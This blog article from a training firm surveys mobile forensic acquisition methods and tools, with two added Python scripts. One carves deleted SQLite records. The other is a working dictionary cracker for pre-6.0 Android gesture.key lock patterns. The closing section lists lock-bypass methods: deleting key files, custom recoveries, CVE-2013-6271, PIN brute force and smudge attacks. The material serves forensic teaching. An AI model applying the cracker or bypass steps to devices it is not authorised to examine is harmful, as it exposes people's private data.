List of Mobile Forensic Tools
The article Mobile Forensic Overview considers different aspects of this subject, such as the methodologies, the phases of the process and the complications inherent in them. When carrying out an investigation, and bearing in mind first and foremost the acquisition and analysis phases, it is necessary to know a wide range of methods, techniques and tools, as well as the criteria for judging whether one is more suitable than another. In this article we address these issues.
Broadly speaking there are three different methods of extracting evidence: physical acquisition, logical acquisition and file system acquisition.
  • Physical acquisition: this is the most thorough method and the one investigators aim for when it is available. It consists of making a bit-for-bit copy of the original storage, thereby preserving all potential evidence, including unallocated space. Its advantage is that deleted elements can be searched for. Its main disadvantage is its complexity compared with the other methods and the time it takes to carry out.
  • Logical acquisition: this consists of making a copy of the objects stored on the device. It makes use of the mechanisms implemented natively by the manufacturer, that is, those normally used to synchronise the device with a computer, so that the required information is requested from the mobile device's operating system. It has the advantage of being a much simpler process than the previous one, although it does not give access to as much data.
  • File system acquisition: this allows all visible files to be obtained through the file system, which does not include deleted files or hidden partitions. Depending on the type of investigation it may be sufficient to use this method, which is less complex than physical acquisition. To carry it out we use the mechanisms integrated in the operating system to copy the files, for example the Android Debug Bridge (ADB) on Android. Even so, it is possible to recover certain deleted information through this method, because operating systems such as Android and iOS store much of their application data in SQLite databases: when records are deleted they are normally only marked as free space to be overwritten later, so their content temporarily remains inside the database file and can be carved out.
When selecting the most suitable method, many aspects are taken into account, such as the level of thoroughness required, the deadline for completing the process, and the kind of data it is necessary to obtain: volatile information, previously deleted information, information from third-party applications, etc.
Another, more practical aid when choosing the most suitable (or the only possible) way of acquiring evidence is a decision diagram that takes into account aspects such as whether USB debugging is enabled, whether the device is locked, whether root access is available, and so on.
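The following script is an added example, not code from the original article or from any of the tools it lists. It shows why a file copied during a file system acquisition can still yield deleted records: it builds a small SQLite "messages" database from constructed sample data, deletes two rows the way an app would, and then scans the raw bytes of the file for the deleted message bodies. It also shows the failure case a practitioner must expect, a database written with SQLite's secure_delete option enabled, where the freed bytes are zeroed and carving finds nothing. Only Python's bundled sqlite3 module is used; the table layout and message texts are assumptions made for the demonstration.

```python
import os
import sqlite3
import tempfile

# Constructed sample chat messages for the demonstration (not from any real device).
MESSAGES = [
    (1, "alice", "meet at the usual place at 9"),
    (2, "bob", "bring the documents from the safe"),
    (3, "alice", "deleted-me: transfer done, wipe this thread"),
    (4, "bob", "deleted-me: ok, deleting it now"),
    (5, "alice", "see you tomorrow"),
]
TO_DELETE = (3, 4)


def build_db(path, secure_delete):
    """Create a small chat database, then delete two rows as an app would."""
    conn = sqlite3.connect(path)
    # secure_delete is a per-connection setting; the compile-time default varies
    # between SQLite builds, so set it explicitly to get a deterministic result.
    conn.execute("PRAGMA secure_delete = %s" % ("ON" if secure_delete else "OFF"))
    conn.execute(
        "CREATE TABLE messages (id INTEGER PRIMARY KEY, sender TEXT, body TEXT)"
    )
    conn.executemany("INSERT INTO messages VALUES (?, ?, ?)", MESSAGES)
    conn.commit()
    conn.executemany("DELETE FROM messages WHERE id = ?", [(i,) for i in TO_DELETE])
    conn.commit()
    conn.close()


def live_rows(path):
    """What a logical query of the database still shows: the surviving row ids."""
    conn = sqlite3.connect(path)
    rows = conn.execute("SELECT id FROM messages ORDER BY id").fetchall()
    conn.close()
    return [r[0] for r in rows]


def carve_bodies(path, needles):
    """Return the needles that still exist as raw bytes in the file.

    Deleted cells are only added to the page's freeblock list, so unless
    secure_delete zeroed them their text is still present and can be carved.
    """
    with open(path, "rb") as f:
        raw = f.read()
    return [n for n in needles if n.encode("utf-8") in raw]


def run_demo():
    """Build one database per setting and report live rows and carved bodies."""
    deleted_bodies = [m[2] for m in MESSAGES if m[0] in TO_DELETE]
    results = {}
    with tempfile.TemporaryDirectory() as workdir:
        for label, secure in (("secure_delete_off", False), ("secure_delete_on", True)):
            path = os.path.join(workdir, label + ".db")
            build_db(path, secure)
            results[label] = {
                "live": live_rows(path),
                "carved": carve_bodies(path, deleted_bodies),
            }
    return results


if __name__ == "__main__":
    for label, r in run_demo().items():
        print(label, "live ids:", r["live"], "carved deleted bodies:", r["carved"])
```

The SQL query returns the same three surviving rows in both cases; only the raw-byte scan differs. On a real acquisition the same scan would be run over msgstore-style databases, their rollback journals and WAL files, which is what the "file carving" features of the tools below automate.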
Below, we present a series of tools that are very useful for extracting information:
General free tools
AFLogical OSE – Open source Android Forensics app and framework is an application in APK format that must be installed beforehand on the Android device. Once the process is complete it allows varied information to be extracted to the SD card (call log, contact list, list of installed applications, text messages and multimedia), which must subsequently be retrieved either by connecting the card to an external reader or through ADB.
Open Source Android Forensics is a framework distributed as a virtual machine image that brings together various tools for the analysis of mobile applications, covering static analysis, dynamic analysis and even forensic analysis.
Andriller is an application for Windows operating systems that brings together different forensic utilities. It allows a great deal of interesting information to be obtained, including data from social media and messaging programs (Skype, Tinder, Viber, WhatsApp, etc.).
FTK Imager Lite allows us to work with memory dumps and images of mobile devices in order to analyse them and obtain evidence.
NowSecure Forensics Community Edition is distributed as a virtual machine image that brings together various tools for carrying out a forensic analysis; its commercial version can also perform different types of evidence extraction and even file carving.
LiME – Linux Memory Extractor is a loadable kernel module that allows a volatile memory dump to be obtained from a Linux-based device, as is the case for Android phones. It has the added advantage that the dump can be sent over the network (TCP) instead of being written to the device's own storage.
Specific free tools
Android Data Extractor Lite (ADEL) is a tool developed in Python that produces a forensic report, in the form of a flowchart, from the SQLite databases of the mobile device. To carry out the process the device must be rooted or have a custom recovery installed.
WhatsApp Xtract allows WhatsApp conversations to be viewed on the computer in a simple and user-friendly way. The databases that store the messages must therefore be obtained from the device beforehand.
Skype Xtractor is an application, supported on both Windows and Linux, that lets us view the information in Skype's main.db file, which stores contacts, chats, calls, transferred files, deleted messages, etc.
Paid tools
Cellebrite UFED Touch is one of the best-known and most complete evidence extraction devices. It supports more than 6,300 different device models running the main mobile operating systems, and it is very simple and intuitive to use.
EnCase Forensic, together with Cellebrite, is a worldwide reference in forensic analysis. Its wide range of features includes identifying encrypted files and attempting to decrypt them with Passware Kit Forensic, a tool that implements specific algorithms for this purpose.
Oxygen Forensic Suite is capable of obtaining information from more than 10,000 different mobile device models, and can also retrieve information from cloud services and import backups or images.
MOBILedit! Forensic allows a great deal of data to be retrieved and advanced operations to be carried out, such as obtaining a complete memory dump, bypassing device-locking measures and creating reports flexibly.
Elcomsoft iOS Forensic Toolkit allows physical acquisition on iOS devices such as the iPhone, iPad and iPod. It also includes other utilities, such as decrypting the keychain that stores the user's passwords on the analysed device, and logging every action performed during the whole process so that a record of them is kept.
To carry out the evidence-gathering process on an Android mobile device, many of the tools require the "USB debugging" option to be enabled, preferably the "Stay awake" option as well, and any screen-lock timeout to be disabled. If the device has a screen lock configured, it must be bypassed first.
Most of the tools described above, mainly the paid ones, include mechanisms to bypass these protections, so it is only necessary to follow the steps they indicate, although this is not always possible.

If the process is to be carried out manually, one or more of the following actions has to be performed:

  • If the device is rooted, we can try to remove the gesture.key or password.key file, depending on the type of lock configured, both of which are stored in /data/system/; alternatively, copy them and recover the pattern through a hash dictionary such as AndroidGestureSHA1, using a tool like Android Pattern Lock Cracker. This works because, on Android versions before 6.0 (which introduced Gatekeeper and different key files), gesture.key holds an unsalted SHA-1 of the pattern's dot indices, whereas password.key is salted with a value kept in the lock settings database and has to be brute-forced together with that salt.
  • Install a custom recovery such as ClockworkMod or Team Win Recovery Project (TWRP) and subsequently disable the device's access lock from the recovery environment.
  • The fragmentation problem on mobile platforms means that the vast majority of devices are affected by vulnerabilities that will never be patched for those models. Depending on the Android version, it may therefore be possible to exploit one of them to gain access to the device, for example CVE-2013-6271.
  • Using brute force. When a 4-digit PIN is used as the security measure it has been demonstrated that it can be recovered in a short period of time, around 16 hours at most: Android enforces a 30-second delay after every five failed attempts, so the 10,000 possible combinations take at most 10,000 / 5 × 30 s, roughly 16.7 hours, when the entry is automated with a USB keyboard emulator.
  • A more sophisticated technique can also be used, as demonstrated by researchers at the University of Pennsylvania in what they called a Smudge Attack: the lock pattern is recovered from the finger smudges left on the screen of the mobile device, using photographs taken from different angles under varying lighting and with the light and colour properties of the images adjusted to bring the trace out.
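The gesture.key dictionary attack from the first bullet above, written out as an added example; this is not code from the original article nor from AndroidGestureSHA1 or Android Pattern Lock Cracker. It enumerates every lock pattern that Android's 3x3 grid accepts (4 to 9 dots, no repeated dot, and a stroke may only skip over a dot that is already part of the pattern), hashes each one the way pre-6.0 Android did (SHA-1 over the raw dot indices, one byte each, no salt), and looks up the 20-byte content of a gesture.key file in the resulting table. The sample key below is constructed from a pattern chosen for the demonstration; on a real case the bytes would come from /data/system/gesture.key copied off a rooted device.

```python
import hashlib

# Dot indices on the 3x3 grid as Android numbers them:
#   0 1 2
#   3 4 5
#   6 7 8
GRID = 3
DOTS = GRID * GRID
MIN_LEN, MAX_LEN = 4, 9


def _midpoint(a, b):
    """Dot lying exactly between a and b, or None if the stroke crosses no dot."""
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * GRID + (ca + cb) // 2


# Precomputed so the enumeration loop stays cheap.
MID = [[_midpoint(a, b) for b in range(DOTS)] for a in range(DOTS)]


def _extend(pattern, visited, out):
    if len(pattern) >= MIN_LEN:
        out.append(tuple(pattern))
    if len(pattern) == MAX_LEN:
        return
    last = pattern[-1]
    for nxt in range(DOTS):
        if nxt in visited:
            continue
        mid = MID[last][nxt]
        # Android's rule: a stroke passing over an unvisited dot would include
        # that dot instead, so such a jump is not a valid continuation.
        if mid is not None and mid not in visited:
            continue
        visited.add(nxt)
        pattern.append(nxt)
        _extend(pattern, visited, out)
        pattern.pop()
        visited.remove(nxt)


def all_patterns():
    """Every pattern the lock screen accepts (389,112 of them)."""
    out = []
    for start in range(DOTS):
        _extend([start], {start}, out)
    return out


def gesture_hash(pattern):
    # Android < 6.0 stores SHA-1(bytes(dot indices)) in gesture.key, unsalted.
    return hashlib.sha1(bytes(pattern)).digest()


def build_dictionary():
    """Map from gesture.key content to the pattern that produced it."""
    return {gesture_hash(p): p for p in all_patterns()}


def crack_gesture_key(key_bytes, dictionary):
    """Look up the 20-byte content of gesture.key; returns the pattern or None."""
    if len(key_bytes) != 20:
        raise ValueError("gesture.key must be exactly 20 bytes (a raw SHA-1 digest)")
    return dictionary.get(key_bytes)


if __name__ == "__main__":
    table = build_dictionary()
    # Constructed sample: the digest a device would store for the pattern 0-1-2-5-8.
    sample_key = gesture_hash((0, 1, 2, 5, 8))
    print("patterns enumerated:", len(table))
    print("recovered pattern:", crack_gesture_key(sample_key, table))
```

Because the hash is unsalted, the whole dictionary is built once, in a few seconds, and every gesture.key afterwards is a single lookup; this is exactly why Android 6.0 moved the lock credential behind Gatekeeper and a hardware-backed, rate-limited check.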

This Blog Article is posted by

Infosavvy, 2nd Floor, Sai Niketan, Chandavalkar Road Opp. Gora Gandhi Hotel, Above Jumbo King, beside Speakwell Institute, Borivali West, Mumbai, Maharashtra 400092